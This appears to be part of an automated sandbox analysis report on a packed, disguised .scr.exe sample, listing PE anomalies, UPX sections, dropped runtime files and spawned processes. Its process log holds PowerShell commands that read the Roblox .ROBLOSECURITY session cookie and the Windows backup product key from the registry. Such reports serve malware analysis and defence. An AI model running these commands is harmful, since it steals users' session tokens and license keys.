failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0xA9D30DED [Wed Apr 14 15:12:45 2060 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A86A7B30
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11538
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4f1a1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1972f
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1c088
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: real checksum: 0x8219e0 should be: 0x827320
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1ac45
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x188ee
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: python312.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1c135b
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8181
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14b65
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xb5c7
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x6d48
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1e3bf
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xaa20d
              Source: xuxqeuoy.dll.43.drStatic PE information: real checksum: 0x0 should be: 0x85b8
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: section name: _RDATA
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE55004 push rsp; retf 0_2_00007FF73AE55005
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095F01 push r12; ret 2_2_00007FF8A8095F10
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095D06 push r12; ret 2_2_00007FF8A8095D08
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8097FFF push r12; ret 2_2_00007FF8A809804A
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095C31 push r10; ret 2_2_00007FF8A8095C33
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8099327 push rsp; ret 2_2_00007FF8A8099328
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095E18 push rsp; ret 2_2_00007FF8A8095E1C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8098419 push r10; retf 2_2_00007FF8A8098485
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095F56 push r12; ret 2_2_00007FF8A8095F73
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8098F42 push rsp; iretq 2_2_00007FF8A8098F43
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A809763E push rbp; retf 2_2_00007FF8A8097657
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095E67 push rdi; iretd 2_2_00007FF8A8095E69
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8097F67 push rbp; iretq 2_2_00007FF8A8097F68
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8096859 push rsi; ret 2_2_00007FF8A8096890
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8097689 push r12; ret 2_2_00007FF8A80976CD
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A809808B push r12; iretd 2_2_00007FF8A809809F
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095F7B push r8; ret 2_2_00007FF8A8095F83
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095EB4 push rsp; iretd 2_2_00007FF8A8095EB5
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095FB9 push r10; ret 2_2_00007FF8A8095FCC
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8098DBF push rsp; retf 2_2_00007FF8A8098DC0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095DF7 push r10; retf 2_2_00007FF8A8095DFA
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095CED push rdx; ret 2_2_00007FF8A8095CF7
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095CE0 push r10; retf 2_2_00007FF8A8095CE2
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A8095CE5 push r8; ret 2_2_00007FF8A8095CEB
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A80982D8 push rdi; iretd 2_2_00007FF8A80982DA
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A872161E push rdx; iretd 2_2_00007FF8A8721621
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF84769D2A5 pushad ; iretd 7_2_00007FF84769D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8477B00BD pushad ; iretd 7_2_00007FF8477B00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8477B83FC push ebx; ret 7_2_00007FF8477B847A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8477B85FD push ebx; ret 7_2_00007FF8477B860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8477B860B push ebx; ret 7_2_00007FF8477B860A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
